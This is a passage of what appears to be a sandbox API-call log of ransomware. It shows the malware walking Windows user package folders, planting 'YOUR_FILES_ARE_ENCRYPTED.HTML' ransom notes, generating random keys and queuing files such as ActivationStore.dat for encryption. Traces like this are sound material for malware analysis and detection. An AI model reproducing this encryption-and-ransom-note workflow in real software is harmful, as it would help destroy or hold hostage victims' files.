lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalState" [0120.985] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalState\\*" [0120.985] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.985] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.985] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.985] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.985] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0120.985] GetProcessHeap () returned 0x600000 [0120.985] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.986] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.987] CloseHandle (hObject=0x320) returned 1 [0120.987] GetProcessHeap () returned 0x600000 [0120.987] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.987] GetProcessHeap () returned 0x600000 [0120.987] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.987] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d759694, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d759694, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d759694, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0120.987] StrStrIW (lpFirst="Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.987] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy") returned 169 [0120.987] GetProcessHeap () returned 0x600000 [0120.987] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.987] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy" [0120.987] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*" [0120.987] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d759694, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d759694, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d759694, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.987] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d759694, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d759694, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d759694, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.987] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d759694, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d759694, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d759694, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.987] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.987] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 185 [0120.987] GetProcessHeap () returned 0x600000 [0120.987] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.988] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0120.988] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0120.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d759694, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d759694, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d77f879, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626978 [0120.989] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d759694, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d759694, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d77f879, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.989] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d759694, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9da2e714, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9da2e714, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.989] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.989] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 205 [0120.989] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.989] lstrlenW (lpString=".dat") returned 4 [0120.989] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.989] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\microsoft.xboxidentityprovider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0120.990] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0120.990] GetProcessHeap () returned 0x600000 [0120.990] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.993] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="D7") returned 2 [0120.993] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="C9") returned 2 [0120.993] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="E9") returned 2 [0120.993] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="51") returned 2 [0120.993] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="CC") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="25") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="D5") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="C8") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="36") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="A0") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="C7") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="C3") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="DE") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="43") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="EE") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="F0") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="A7") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="0D") returned 2 [0120.993] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="3D") returned 2 [0120.994] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="62") returned 2 [0120.994] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="FB") returned 2 [0120.994] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="CF") returned 2 [0120.994] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="8F") returned 2 [0120.994] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="2F") returned 2 [0120.994] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="E6") returned 2 [0120.994] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="8E") returned 2 [0120.994] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="91") returned 2 [0120.994] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="23") returned 2 [0120.994] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="14") returned 2 [0120.994] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="3A") returned 2 [0120.994] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="D9") returned 2 [0120.994] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="7E") returned 2 [0120.994] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0120.994] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.994] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.994] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9d77f879, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d77f879, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d77f879, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.994] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.994] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 210 [0120.995] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.995] lstrlenW (lpString=".LOG1") returned 5 [0120.995] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.995] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9d77f879, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d77f879, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d77f879, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.995] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.995] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 210 [0120.995] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.995] lstrlenW (lpString=".LOG2") returned 5 [0120.995] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.995] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9d77f879, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d77f879, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d77f879, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.995] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0120.995] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 215 [0120.995] GetProcessHeap () returned 0x600000 [0120.995] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\microsoft.xboxidentityprovider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.996] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.997] CloseHandle (hObject=0x31c) returned 1 [0120.997] GetProcessHeap () returned 0x600000 [0120.997] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.997] GetProcessHeap () returned 0x600000 [0120.997] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.997] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d759694, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d759694, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d759694, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.997] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.997] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 199 [0120.997] GetProcessHeap () returned 0x600000 [0120.997] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\microsoft.xboxidentityprovider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.002] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.005] CloseHandle (hObject=0x320) returned 1 [0121.005] GetProcessHeap () returned 0x600000 [0121.005] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.005] GetProcessHeap () returned 0x600000 [0121.005] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.005] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, 